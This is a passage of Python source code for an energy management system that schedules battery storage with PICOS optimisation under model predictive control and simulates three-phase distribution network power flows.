v_unconstrained_buses)
P_import_ems = output_ems['P_import_val']
P_export_ems = output_ems['P_export_val']
P_ES_ems = output_ems['P_ES_val']
P_demand_ems = output_ems['P_demand_val']
#convert P_EV signals to system time-series scale
N_ESs = len(self.storage_assets)
N_nondispatch = len(self.nondispatch_assets)
P_ESs = np.zeros([self.T,N_ESs])
for t in range(self.T):
t_ems = int(t/(self.dt_ems/self.dt))
P_ESs[t,:] = P_ES_ems[t_ems,:]
#######################################
### STEP 2: update the controllable assets
#######################################
for i in range(N_ESs):
self.storage_assets[i].update_control(P_ESs[:,i])
#######################################
### STEP 3: simulate the network
#######################################
N_buses = self.network.N_buses
N_phases = self.network.N_phases
P_demand_buses = np.zeros([self.T,N_buses,N_phases])
Q_demand_buses = np.zeros([self.T,N_buses,N_phases])
#calculate the total real and reactive power demand at each bus phase
for i in range(N_ESs):
bus_id = self.storage_assets[i].bus_id
phases_i = self.storage_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[:,bus_id,ph_i] +=\
self.storage_assets[i].Pnet/N_phases_i
Q_demand_buses[:,bus_id,ph_i] +=\
self.storage_assets[i].Qnet/N_phases_i
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
phases_i = self.nondispatch_assets[i].phases
N_phases_i = np.size(phases_i)
for ph_i in np.nditer(phases_i):
P_demand_buses[:,bus_id,ph_i] +=\
self.nondispatch_assets[i].Pnet/N_phases_i
Q_demand_buses[:,bus_id,ph_i] +=\
self.nondispatch_assets[i].Qnet/N_phases_i
#Store power flow results as a list of network objects
PF_network_res = []
print('*** SIMULATING THE NETWORK ***')
for t in range(self.T):
#for each time interval:
#set up a copy of the network for simulation interval t
network_t = copy.deepcopy(self.network)
network_t.clear_loads()
for bus_id in range(N_buses):
for ph_i in range(N_phases):
Pph_t = P_demand_buses[t,bus_id,ph_i]
Qph_t = Q_demand_buses[t,bus_id,ph_i]
#add P,Q loads to the network copy
network_t.set_load(bus_id,ph_i,Pph_t,Qph_t)
#run the power flow simulation
network_t.zbus_pf()
PF_network_res.append(network_t)
print('*** NETWORK SIMULATION COMPLETE ***')
return {'PF_network_res' :PF_network_res,\
'P_ES_ems':P_ES_ems,\
'P_import_ems':P_import_ems,\
'P_export_ems':P_export_ems,\
'P_demand_ems':P_demand_ems}
#######################################
### Model Predictive Control Methods
#######################################
def EMS_copper_plate_t0(self, t0):
"""
Setup and run a basic energy optimisation (single copper plate network
model) for MPC interval t0
"""
#######################################
### STEP 0: setup variables
#######################################
t0_dt = int(t0*self.dt_ems/self.dt)
T_mpc = self.T_ems-t0
T_range = np.arange(t0,self.T_ems)
prob = pic.Problem()
N_ES = len(self.storage_assets)
N_nondispatch = len(self.nondispatch_assets)
P_demand_actual = np.zeros(self.T)
P_demand_pred = np.zeros(self.T)
P_demand = np.zeros(T_mpc)
for i in range(N_nondispatch):
P_demand_actual += self.nondispatch_assets[i].Pnet
P_demand_pred += self.nondispatch_assets[i].Pnet_pred
# Assemble P_demand out of P actual and P predicted and convert to EMS
# time series scale
for t_ems in T_range:
t_indexes = ((t_ems * self.dt_ems / self.dt
+ np.arange(0, self.dt_ems / self.dt)).astype(int))
if t_ems == t0:
P_demand[t_ems-t0] = np.mean(P_demand_actual[t_indexes])
else:
P_demand[t_ems-t0] = np.mean(P_demand_pred[t_indexes])
# get total ES system demand (before optimisation)
Pnet_ES_sum = np.zeros(self.T)
for i in range(N_ES):
Pnet_ES_sum += self.storage_assets[i].Pnet
#get the maximum (historical) demand before t0
if t0 > 0:
P_max_demand_pre_t0 = np.max(P_demand_actual[0:t0_dt]\
+ Pnet_ES_sum[0:t0_dt])
else:
P_max_demand_pre_t0 = 0
#######################################
### STEP 1: set up decision variables
#######################################
# energy storage system input powers
P_ES = prob.add_variable('P_ES', (T_mpc,N_ES), vtype='continuous')
# energy storage system input powers
P_ES_ch = prob.add_variable('P_ES_ch', (T_mpc,N_ES),
vtype='continuous')
# energy storage system output powers
P_ES_dis = prob.add_variable('P_ES_dis', (T_mpc,N_ES),
vtype='continuous')
# (positive) net power imports
P_import = prob.add_variable('P_import', (T_mpc,1), vtype='continuous')
# (positive) net power exports
P_export = prob.add_variable('P_export', (T_mpc,1), vtype='continuous')
# (positive) maximum demand dummy variable
P_max_demand = prob.add_variable('P_max_demand', 1, vtype='continuous')
# (positive) minimum terminal energy dummy variable
E_T_min = prob.add_variable('E_T_min', 1, vtype='continuous')
#######################################
### STEP 2: set up constraints
#######################################
#lower triangle matrix summing powers
Asum = pic.new_param('Asum',np.tril(np.ones([T_mpc,T_mpc])))
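# row t of Asum sums powers over EMS intervals 0..t, so dt_ems*Asum*P is
# the cumulative energy change relative to the energy at t0_dt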
# linear battery model constraints
for i in range(N_ES):
# maximum power constraint
prob.add_constraint((P_ES_ch[:,i] - P_ES_dis[:,i])\
<= self.storage_assets[i].Pmax[T_range])
# minimum power constraint
prob.add_constraint((P_ES_ch[:,i] - P_ES_dis[:,i])\
>= self.storage_assets[i].Pmin[T_range])
# maximum energy constraint
prob.add_constraint((self.dt_ems
* Asum
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
<= (self.storage_assets[i].Emax[T_range]
- self.storage_assets[i].E[t0_dt]))
# minimum energy constraint
prob.add_constraint((self.dt_ems
* Asum
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
>= (self.storage_assets[i].Emin[T_range]
- self.storage_assets[i].E[t0_dt]))
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[T_mpc-1,:]
* (P_ES_ch[:,i] - P_ES_dis[:,i])
+ E_T_min)\
>= (self.storage_assets[i].ET
- self.storage_assets[i].E[t0_dt]))
eff_opt = self.storage_assets[i].eff_opt
# P_ES_ch & P_ES_dis dummy variables
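# P_ES is the grid-side power: storing P_ES_ch requires drawing
# P_ES_ch/eff_opt from the grid, while discharging P_ES_dis delivers only
# P_ES_dis*eff_opt, so round-trip losses enter the model linearly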
for t in range(T_mpc):
prob.add_constraint(P_ES[t, i] == (P_ES_ch[t, i]
/ eff_opt
- P_ES_dis[t, i]
* eff_opt))
prob.add_constraint(P_ES_ch[t, i] >= 0)
prob.add_constraint(P_ES_dis[t, i] >= 0)
# import/export constraints
for t in range(T_mpc):
# net import variables
prob.add_constraint((sum(P_ES[t, :]) + P_demand[t])\
== (P_import[t] - P_export[t]))
# maximum import constraint
prob.add_constraint(P_import[t] <= self.market.Pmax[t0+t])
# minimum import constraint
prob.add_constraint(P_import[t] >= 0)
# maximum export constraint
prob.add_constraint(P_export[t] <= -self.market.Pmin[t0+t])
# minimum export constraint
prob.add_constraint(P_export[t] >= 0)
#maximum demand dummy variable constraint
prob.add_constraint((P_max_demand + P_max_demand_pre_t0)\
>= (P_import[t] - P_export[t]) )
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand >= 0)
if self.market.FR_window is not None:
FR_window = self.market.FR_window
FR_SoC_max = self.market.FR_SOC_max
FR_SoC_min = self.market.FR_SOC_min
for t in range(t0,self.T_ems):
if FR_window[t] ==1:
for i in range(N_ES):
# FR window maximum energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* (P_ES_ch[:, i]
- P_ES_dis[:, i]))\
<= (FR_SoC_max
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt])
# FR window minimum energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
>= (FR_SoC_min
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt])
# minimum terminal energy dummy variable constraint
prob.add_constraint(E_T_min >= 0)
#######################################
### STEP 3: set up objective
#######################################
prices_import = pic.new_param('prices_import',
self.market.prices_import)
prices_export = pic.new_param('prices_export',
self.market.prices_export)
terminal_const = 1e12 # coeff for objective terminal soft constraint
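# E_T_min is a nonnegative slack on the terminal-energy target; the 1e12
# weight makes any shortfall prohibitively expensive, so the soft
# constraint behaves like a hard one whenever it is feasible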
prob.set_objective('min', (self.market.demand_charge * P_max_demand +\
sum(sum(self.dt_ems
* self.storage_assets[i].c_deg_lin
* (P_ES_ch[t, i] + P_ES_dis[t,i])\
for i in range(N_ES))
+ self.dt_ems
* prices_import[t0 + t]
* P_import[t]
- self.dt_ems
* prices_export[t0 + t]
* P_export[t]\
for t in range(T_mpc))
+ terminal_const * E_T_min))
#######################################
### STEP 4: solve the optimisation
#######################################
print('*** SOLVING THE OPTIMISATION PROBLEM ***')
prob.solve(verbose = 0)
print('*** OPTIMISATION COMPLETE ***')
P_ES_val = np.array(P_ES.value)
P_import_val = np.array(P_import.value)
P_export_val = np.array(P_export.value)
P_demand_val = np.array(P_demand)
E_T_min_val = np.array(E_T_min.value)
return {'P_ES_val':P_ES_val,\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val,\
'E_T_min_val':E_T_min_val}
def EMS_copper_plate_t0_c1deg(self, t0):
"""
setup and run a basic energy optimisation (single copper plate network
model) for MPC interval t0
"""
#######################################
### STEP 0: setup variables
#######################################
t0_dt = int(t0 * self.dt_ems / self.dt)
T_mpc = self.T_ems - t0
T_range = np.arange(t0,self.T_ems)
prob = pic.Problem()
N_ES = len(self.storage_assets)
N_nondispatch = len(self.nondispatch_assets)
P_demand_actual = np.zeros(self.T)
P_demand_pred = np.zeros(self.T)
P_demand = np.zeros(T_mpc)
for i in range(N_nondispatch):
P_demand_actual += self.nondispatch_assets[i].Pnet
P_demand_pred += self.nondispatch_assets[i].Pnet_pred
# Assemble P_demand out of P actual and P predicted and convert to
# EMS time series scale
for t_ems in T_range:
t_indexes = (t_ems
* self.dt_ems
/ self.dt
+ np.arange(0, self.dt_ems / self.dt)).astype(int)
if t_ems == t0:
P_demand[t_ems-t0] = np.mean(P_demand_actual[t_indexes])
else:
P_demand[t_ems-t0] = np.mean(P_demand_pred[t_indexes])
#get total ES system demand (before optimisation)
Pnet_ES_sum = np.zeros(self.T)
for i in range(N_ES):
Pnet_ES_sum += self.storage_assets[i].Pnet
#get the maximum (historical) demand before t0
if t0 > 0:
P_max_demand_pre_t0 = (np.max(P_demand_actual[0:t0_dt]
+ Pnet_ES_sum[0: t0_dt]))
else:
P_max_demand_pre_t0 = 0
#######################################
### STEP 1: set up decision variables
#######################################
# energy storage system input powers
P_ES = prob.add_variable('P_ES', (T_mpc,N_ES), vtype='continuous')
# energy storage system input powers
P_ES_ch = prob.add_variable('P_ES_ch', (T_mpc,N_ES),
vtype='continuous')
# energy storage system output powers
P_ES_dis = prob.add_variable('P_ES_dis', (T_mpc,N_ES),
vtype='continuous')
# (positive) net power imports
P_import = prob.add_variable('P_import', (T_mpc,1), vtype='continuous')
# (positive) net power exports
P_export = prob.add_variable('P_export', (T_mpc,1), vtype='continuous')
# (positive) maximum demand dummy variable
P_max_demand = prob.add_variable('P_max_demand', 1, vtype='continuous')
# (positive) minimum terminal energy dummy variable
E_T_min = prob.add_variable('E_T_min', 1, vtype='continuous')
#######################################
### STEP 2: set up constraints
#######################################
# lower triangle matrix summing powers
Asum = pic.new_param('Asum', np.tril(np.ones([T_mpc,T_mpc])))
# Asum = cvxopt.matrix(np.tril(np.ones([T_mpc,T_mpc])), (T_mpc,T_mpc),
# 'd')
# linear battery model constraints
for i in range(N_ES):
# maximum power constraint
prob.add_constraint((P_ES_ch[:, i] - P_ES_dis[:, i])\
<= self.storage_assets[i].Pmax[T_range])
# minimum power constraint
prob.add_constraint((P_ES_ch[:, i] - P_ES_dis[:, i])\
>= self.storage_assets[i].Pmin[T_range])
# maximum energy constraint
prob.add_constraint((self.dt_ems
* Asum
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
<= (self.storage_assets[i].Emax[T_range]
- self.storage_assets[i].E[t0_dt]))
# minimum energy constraint
prob.add_constraint((self.dt_ems
* Asum
* (P_ES_ch[:,i] - P_ES_dis[:,i]))\
>= (self.storage_assets[i].Emin[T_range]
- self.storage_assets[i].E[t0_dt]))
# final energy constraint
prob.add_constraint((self.dt_ems
* Asum[T_mpc-1, :]
* (P_ES_ch[:, i] - P_ES_dis[:,i])
+ E_T_min)\
>= (self.storage_assets[i].ET
- self.storage_assets[i].E[t0_dt]))
eff_opt = self.storage_assets[i].eff_opt
#P_ES_ch & P_ES_dis dummy variables
for t in range(T_mpc):
prob.add_constraint(P_ES[t, i] == (P_ES_ch[t, i]
/ eff_opt
- P_ES_dis[t, i]
* eff_opt))
prob.add_constraint(P_ES_ch[t, i] >= 0)
prob.add_constraint(P_ES_dis[t, i] >= 0)
#import/export constraints
for t in range(T_mpc):
# net import variables
prob.add_constraint(sum(P_ES[t, :]) + P_demand[t]\
== P_import[t] - P_export[t])
# maximum import constraint
prob.add_constraint(P_import[t] <= self.market.Pmax[t0+t])
# minimum import constraint
prob.add_constraint(P_import[t] >= 0)
# maximum export constraint
prob.add_constraint(P_export[t] <= -self.market.Pmin[t0 + t])
# minimum export constraint
prob.add_constraint(P_export[t] >= 0)
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand + P_max_demand_pre_t0\
>= P_import[t] - P_export[t])
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand >= 0)
# minimum terminal energy dummy variable constraint
prob.add_constraint(E_T_min[:] >= 0)
#if FFR energy constraints
if self.market.FR_window is not None:
FR_window = self.market.FR_window
FR_SoC_max = self.market.FR_SOC_max
FR_SoC_min = self.market.FR_SOC_min
for t in range(T_mpc):
if FR_window[t] == 1:
for i in range(N_ES):
# FR window maximum energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* P_ES[:, i])\
<= ((FR_SoC_max
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt]))
# FR window minimum energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* P_ES[:, i])\
>= ((FR_SoC_min
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt]))
#######################################
### STEP 3: set up objective
#######################################
prices_import = pic.new_param('prices_import',
self.market.prices_import)
prices_export = pic.new_param('prices_export',
self.market.prices_export)
terminal_const = 1e12 #coeff for objective terminal soft constraint
prob.set_objective('min', (self.market.demand_charge
* P_max_demand
+ sum(sum(self.dt_ems
* self.storage_assets[i].c_deg_lin
* (P_ES_ch[t,i] + P_ES_dis[t,i])\
for i in range(N_ES))
+ self.dt_ems
* prices_import[t0 + t]
* P_import[t]
+ -self.dt_ems
* prices_export[t0 + t]
* P_export[t]\
for t in range(T_mpc))
+ terminal_const
* E_T_min))
#######################################
### STEP 4: solve the optimisation
#######################################
print('*** SOLVING THE OPTIMISATION PROBLEM ***')
#prob.solve(verbose = 0,solver='cvxopt')
prob.solve(verbose = 0)
print('*** OPTIMISATION COMPLETE ***')
P_ES_val = np.array(P_ES.value)
P_import_val = np.array(P_import.value)
P_export_val = np.array(P_export.value)
P_demand_val = np.array(P_demand)
return {'opt_prob':prob,\
'P_ES_val':P_ES_val,\
'P_import_val':P_import_val,\
'P_export_val':P_export_val,\
'P_demand_val':P_demand_val}
# NEEDED FOR OXEMF EV CASE
def EMS_3ph_linear_t0(self, t0, i_unconstrained_lines=[],
v_unconstrained_buses = []):
"""
Energy management system optimization assuming 3 phase linear network
model for Model Predictive Control interval t0
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
t0 : int
Interval in Model Predictive Control. If open loop, t0 = 0
i_unconstrained_lines : list
List of network lines which have unconstrained current
v_unconstrained_buses : list
List of buses at which the voltage is not constrained
Returns
-------
Output : dictionary
The following numpy.ndarrays are present depending upon asset mix:
P_ES_val : Charge/discharge power for storage assets (kW)
P_import_val : Power imported from central grid (kW)
P_export_val : Power exported to central grid (kW)
P_demand_val : System power demand at energy management time
resolution (kW)
PF_networks_lin : Network 3ph list of objects, one for each
optimisation interval, storing the linear power
flow model used to formulate network
constraints
"""
#######################################
### STEP 0: setup variables
#######################################
prob = pic.Problem()
t0_dt = int(t0*self.dt_ems/self.dt)
T_mpc = self.T_ems-t0
T_range = np.arange(t0,self.T_ems)
N_buses = self.network.N_buses
N_phases = self.network.N_phases
N_ES = len(self.storage_assets)
N_nondispatch = len(self.nondispatch_assets)
P_demand_actual = np.zeros([self.T,N_nondispatch])
P_demand_pred = np.zeros([self.T,N_nondispatch])
P_demand = np.zeros([T_mpc,N_nondispatch])
Q_demand_actual = np.zeros([self.T,N_nondispatch])
Q_demand_pred = np.zeros([self.T,N_nondispatch])
Q_demand = np.zeros([T_mpc,N_nondispatch])
for i in range(N_nondispatch):
P_demand_actual[:,i] = self.nondispatch_assets[i].Pnet
P_demand_pred[:,i] = self.nondispatch_assets[i].Pnet_pred
Q_demand_actual[:,i] = self.nondispatch_assets[i].Qnet
Q_demand_pred[:,i] = self.nondispatch_assets[i].Qnet_pred
#Assemble P_demand out of P actual and P predicted and convert to EMS
#time series scale
for i in range(N_nondispatch):
for t_ems in T_range:
t_indexes = (t_ems*self.dt_ems/self.dt +
np.arange(0,self.dt_ems/self.dt)).astype(int)
if t_ems == t0:
P_demand[t_ems-t0,i] =\
np.mean(P_demand_actual[t_indexes,i])
Q_demand[t_ems-t0,i] = \
np.mean(Q_demand_actual[t_indexes,i])
else:
P_demand[t_ems-t0,i] = np.mean(P_demand_pred[t_indexes,i])
Q_demand[t_ems-t0,i] = np.mean(Q_demand_pred[t_indexes,i])
#get total ES system demand (before optimisation)
Pnet_ES_sum = np.zeros(self.T)
for i in range(N_ES):
Pnet_ES_sum += self.storage_assets[i].Pnet
#get the maximum (historical) demand before t0
if t0 == 0:
P_max_demand_pre_t0 = 0
else:
if N_nondispatch == 0: P_max_demand_pre_t0 = np.max(Pnet_ES_sum[0:t0_dt])
else:
P_demand_act_sum = sum(P_demand_actual[0:t0_dt,i] \
for i in range(N_nondispatch))
P_max_demand_pre_t0 = np.max(P_demand_act_sum +
Pnet_ES_sum[0:t0_dt])
#Set up Matrix linking nondispatchable assets to their bus and phase
G_wye_nondispatch = np.zeros([3*(N_buses-1),N_nondispatch])
G_del_nondispatch = np.zeros([3*(N_buses-1),N_nondispatch])
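# Each column spreads an asset's power equally over its connected phases
# (1/N_phases per phase); rows cover the 3*(N_buses-1) non-slack bus
# phases, indexed by 3*(bus_id-1) + phase.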
for i in range(N_nondispatch):
asset_N_phases = self.nondispatch_assets[i].phases.size
bus_id = self.nondispatch_assets[i].bus_id
# check if Wye connected
wye_flag = self.network.bus_df[self.\
network.bus_df['number']==\
bus_id]['connect'].values[0]=='Y'
for ph in np.nditer(self.nondispatch_assets[i].phases):
bus_ph_index = 3*(bus_id-1) + ph
if wye_flag is True:
G_wye_nondispatch[bus_ph_index,i] = 1/asset_N_phases
else:
G_del_nondispatch[bus_ph_index,i] = 1/asset_N_phases
#Set up Matrix linking energy storage assets to their bus and phase
G_wye_ES = np.zeros([3*(N_buses-1),N_ES])
G_del_ES = np.zeros([3*(N_buses-1),N_ES])
for i in range(N_ES):
asset_N_phases = self.storage_assets[i].phases.size
bus_id = self.storage_assets[i].bus_id
# check if Wye connected
wye_flag = self.network.bus_df[self.\
network.bus_df['number']==\
bus_id]['connect'].values[0]=='Y'
for ph in np.nditer(self.storage_assets[i].phases):
bus_ph_index = 3*(bus_id-1) + ph
if wye_flag is True:
G_wye_ES[bus_ph_index,i] = 1/asset_N_phases
else:
G_del_ES[bus_ph_index,i] = 1/asset_N_phases
G_wye_nondispatch_PQ = np.concatenate((G_wye_nondispatch,
G_wye_nondispatch),axis=0)
G_del_nondispatch_PQ = np.concatenate((G_del_nondispatch,
G_del_nondispatch),axis=0)
G_wye_ES_PQ = np.concatenate((G_wye_ES,G_wye_ES),axis=0)
G_del_ES_PQ = np.concatenate((G_del_ES,G_del_ES),axis=0)
#######################################
### STEP 1: set up decision variables
#######################################
# energy storage system input powers
P_ES = prob.add_variable('P_ES',
(T_mpc,N_ES), vtype='continuous')
# energy storage system input powers
P_ES_ch = prob.add_variable('P_ES_ch',
(T_mpc,N_ES), vtype='continuous')
# energy storage system output powers
P_ES_dis = prob.add_variable('P_ES_dis',
(T_mpc,N_ES), vtype='continuous')
# (positive) net power imports
P_import = prob.add_variable('P_import',
(T_mpc,1), vtype='continuous')
# (positive) net power exports
P_export = prob.add_variable('P_export',
(T_mpc,1), vtype='continuous')
# (positive) maximum demand dummy variable
P_max_demand = prob.add_variable('P_max_demand',
1, vtype='continuous')
# (positive) minimum terminal energy dummy variable
E_T_min = prob.add_variable('E_T_min',
N_ES, vtype='continuous')
#######################################
### STEP 2: set up linear power flow models
#######################################
PF_networks_lin = []
P_lin_buses = np.zeros([T_mpc,N_buses,N_phases])
Q_lin_buses = np.zeros([T_mpc,N_buses,N_phases])
for t in range(T_mpc):
#Setup linear power flow model:
for i in range(N_nondispatch):
bus_id = self.nondispatch_assets[i].bus_id
phases_i = self.nondispatch_assets[i].phases
for ph_i in np.nditer(phases_i):
bus_ph_index = 3*(bus_id-1) + ph_i
P_lin_buses[t,bus_id,ph_i] +=\
(G_wye_nondispatch[bus_ph_index,i]+\
G_del_nondispatch[bus_ph_index,i])*P_demand[t,i]
Q_lin_buses[t,bus_id,ph_i] +=\
(G_wye_nondispatch[bus_ph_index,i]+\
G_del_nondispatch[bus_ph_index,i])*Q_demand[t,i]
#set up a copy of the network for MPC interval t
network_t = copy.deepcopy(self.network)
network_t.clear_loads()
for bus_id in range(N_buses):
for ph_i in range(N_phases):
Pph_t = P_lin_buses[t,bus_id,ph_i]
Qph_t = Q_lin_buses[t,bus_id,ph_i]
#add P,Q loads to the network copy
network_t.set_load(bus_id,ph_i,Pph_t,Qph_t)
network_t.zbus_pf()
v_lin0 = network_t.v_net_res
S_wye_lin0 = network_t.S_PQloads_wye_res
S_del_lin0 = network_t.S_PQloads_del_res
network_t.linear_model_setup(v_lin0,S_wye_lin0,S_del_lin0)
# note that phases need to be 120 degrees apart for good results
network_t.linear_pf()
PF_networks_lin.append(network_t)
#######################################
### STEP 3: set up constraints
#######################################
# lower triangle matrix summing powers
Asum = pic.new_param('Asum',np.tril(np.ones([T_mpc,T_mpc])))
# energy storage asset constraints
for i in range(N_ES):
# maximum power constraint
prob.add_constraint(P_ES[:,i] <=
self.storage_assets[i].Pmax[T_range])
# minimum power constraint
prob.add_constraint(P_ES[:,i] >=
self.storage_assets[i].Pmin[T_range])
# maximum energy constraint
prob.add_constraint(self.dt_ems * Asum * (P_ES_ch[:,i] -
P_ES_dis[:,i]) <=
self.storage_assets[i].Emax[T_range] -
self.storage_assets[i].E[t0_dt])
# minimum energy constraint
prob.add_constraint(self.dt_ems * Asum * (P_ES_ch[:,i] -
P_ES_dis[:,i]) >=
self.storage_assets[i].Emin[T_range] -
self.storage_assets[i].E[t0_dt])
# final energy constraint
prob.add_constraint(self.dt_ems * Asum[T_mpc-1,:] * (P_ES_ch[:,i] -
P_ES_dis[:,i]) + E_T_min[i] >=
self.storage_assets[i].ET -
self.storage_assets[i].E[t0_dt])
eff_opt = self.storage_assets[i].eff_opt
#P_ES_ch & P_ES_dis dummy variables
for t in range(T_mpc):
prob.add_constraint(P_ES[t,i] == P_ES_ch[t,i]/eff_opt -
P_ES_dis[t,i] * eff_opt)
prob.add_constraint(P_ES_ch[t,i] >= 0)
prob.add_constraint(P_ES_dis[t,i] >= 0)
#import/export constraints
for t in range(T_mpc):
# maximum import constraint
prob.add_constraint(P_import[t] <= self.market.Pmax[t0 + t])
# minimum import constraint
prob.add_constraint(P_import[t] >= 0)
# maximum export constraint
prob.add_constraint(P_export[t] <= -self.market.Pmin[t0 + t])
# minimum export constraint
prob.add_constraint(P_export[t] >= 0)
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand + P_max_demand_pre_t0 >=
P_import[t]-P_export[t])
# maximum demand dummy variable constraint
prob.add_constraint(P_max_demand >= 0)
# Network constraints
for t in range(T_mpc):
network_t = PF_networks_lin[t]
# Note that linear power flow matrices are in units of W (not kW)
PQ0_wye = np.concatenate((np.real(network_t.S_PQloads_wye_res),\
np.imag(network_t.S_PQloads_wye_res)))\
*1e3
PQ0_del = np.concatenate((np.real(network_t.S_PQloads_del_res),\
np.imag(network_t.S_PQloads_del_res)))\
*1e3
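# A_Pslack and b_Pslack express the linearised slack-bus real power (in W)
# as an affine function of the storage injections; dividing by 1e3 below
# converts it back to kW for the import/export balance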
A_Pslack = (np.matmul\
(np.real(np.matmul\
(network_t.vs.T,\
np.matmul(np.conj(network_t.Ysn),\
np.conj(network_t.M_wye)))),\
G_wye_ES_PQ)\
+ np.matmul\
(np.real(np.matmul\
(network_t.vs.T,\
np.matmul(np.conj(network_t.Ysn),\
np.conj(network_t.M_del)))),\
G_del_ES_PQ))
b_Pslack = np.real(np.matmul\
(network_t.vs.T,\
np.matmul(np.conj\
(network_t.Ysn),\
np.matmul(np.conj\
(network_t.M_wye),\
PQ0_wye))))\
+np.real(np.matmul\
(network_t.vs.T,\
np.matmul(np.conj\
(network_t.Ysn),\
np.matmul(np.conj\
(network_t.M_del),
PQ0_del))))\
+np.real(np.matmul\
(network_t.vs.T,\
(np.matmul(np.conj\
(network_t.Yss),\
np.conj(network_t.vs))\
+ np.matmul(np.conj\
(network_t.Ysn),\
np.conj(network_t.M0)))))
# net import variables
prob.add_constraint(P_import[t]-P_export[t] ==\
(np.sum(A_Pslack[i]*P_ES[t,i]\
*1e3 for i in range(N_ES))\
+ b_Pslack)/1e3)
# Voltage magnitude constraints
A_vlim = np.matmul(network_t.K_wye,G_wye_ES_PQ)\
+ np.matmul(network_t.K_del,G_del_ES_PQ)
b_vlim = network_t.v_lin_abs_res
#get max/min bus voltages, removing slack and reshaping in a column
v_abs_max_vec = network_t.v_abs_max[1:,:].reshape(-1,1)
v_abs_min_vec = network_t.v_abs_min[1:,:].reshape(-1,1)
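# one upper and one lower voltage-magnitude constraint per non-slack bus
# phase, skipping any bus listed in v_unconstrained_buses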
for bus_ph_index in range(0,N_phases*(N_buses-1)):
if int(bus_ph_index/3) not in (np.array\
(v_unconstrained_buses)-1):
prob.add_constraint(sum(A_vlim[bus_ph_index,i]\
*(P_ES[t,i])\
*1e3 for i in range(N_ES))\
+ b_vlim[bus_ph_index] <=\
v_abs_max_vec[bus_ph_index])
prob.add_constraint(sum(A_vlim[bus_ph_index,i]\
*(P_ES[t,i])\
*1e3 for i in range(N_ES))\
+ b_vlim[bus_ph_index] >=\
v_abs_min_vec[bus_ph_index])
# Line current magnitude constraints:
for line_ij in range(network_t.N_lines):
if line_ij not in i_unconstrained_lines:
iabs_max_line_ij = network_t.i_abs_max[line_ij,:] #3 phases
# maximum current magnitude constraint
A_line = np.matmul(network_t.Jabs_dPQwye_list[line_ij],\
G_wye_ES_PQ)\
+ np.matmul(network_t.\
Jabs_dPQdel_list[line_ij],\
G_del_ES_PQ)
for ph in range(N_phases):
prob.add_constraint(sum(A_line[ph,i]\
* P_ES[t,i]\
* 1e3 for i in range(N_ES))\
+ network_t.\
Jabs_I0_list[line_ij][ph] <=\
iabs_max_line_ij[ph])
#if FFR energy constraints
if self.market.FR_window is not None:
FR_window = self.market.FR_window
FR_SoC_max = self.market.FR_SOC_max
FR_SoC_min = self.market.FR_SOC_min
for t in range(T_mpc):
if FR_window[t] ==1:
for i in range(N_ES):
# FR window maximum energy constraint
prob.add_constraint((self.dt_ems
* Asum[t, :]
* P_ES[:,i])\
<= ((FR_SoC_max
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt]))
# FR window minimum energy constraint
prob.add_constraint((self.dt_ems
* Asum[t,:]
* P_ES[:,i])\
>= ((FR_SoC_min
* self.storage_assets[i].Emax)
- self.storage_assets[i].E[t0_dt]))
#######################################
### STEP 4: set up objective
#######################################
# minimum terminal energy dummy variable constraint
prob.add_constraint(E_T_min >= 0)
#coeff for objective terminal soft constraint
terminal_const = 1e12
prices_import = pic.new_param('prices_import',
self.market.prices_import)
prices_export = pic.new_param('prices_export',
self.market.prices_export)
prob.set_objective('min', self.market.demand_charge*\
(P_max_demand+P_max_demand_pre_t0) +
sum(sum(self.dt_ems*self.storage_assets[i].\
c_deg_lin*(P_ES_ch[t,i]+
P_ES_dis[t,i])\
for i in range(N_ES))\
+ self.dt_ems*prices_import[t0+t]*P_import[t]\
- self.dt_ems*prices_export[t0+t]*P_export[t]
for t in range(T_mpc))\
+ sum(terminal_const*E_T_min[i]\
for i in range(N_ES)))
#######################################
### STEP 5: solve the optimisation
#######################################
print('*** SOLVING THE OPTIMISATION PROBLEM ***')
prob.solve(verbose = 0)
print('*** OPTIMISATION COMPLETE ***')
P_ES_val = np.array(P_ES.value)
P_import_val = np.array(P_import.value)
P_export_val = np.array(P_export.value)
P_demand_val = np.array(P_demand)
return {'P_ES_val':P_ES_val,
'P_import_val':P_import_val,
'P_export_val':P_export_val,
'P_demand_val':P_demand_val,
'PF_networks_lin':PF_networks_lin}
# NEEDED FOR OXEMF EV CASE
def simulate_network_mpc_3phPF(self, ems_type = '3ph',
i_unconstrained_lines=[],
v_unconstrained_buses = []):
"""
Run the Energy Management System using Model Predictive Control (MPC)
and simulate an IEEE 13 bus network either copper plate or 3ph
Parameters
----------
self : EnergySystem object
Object containing information on assets, market, network and time
resolution.
ems_type : string
Identifies whether the system is copper plate or 3ph. Default 3ph
i_unconstrained_lines : list
List of network lines which have unconstrained current
v_unconstrained_buses : list
List of buses at which the voltage is not constrained
Returns
-------
Output : dictionary
PF_network_res : Network power flow results stored as a list of
objects
P_ES_ems : Charge/discharge power for storage assets at energy
management time resolution (kW)
P_import_ems :Power imported from central grid at energy
management time resolution (kW)
P_export_ems :Power exported to central grid at energy
management time resolution(kW)
P_demand_ems :System power demand at energy management time
resolution (kW)
"""
#######################################
### STEP 0: setup variables
#######################################
N_ESs = len(self.storage_assets) #number of energy storage assets
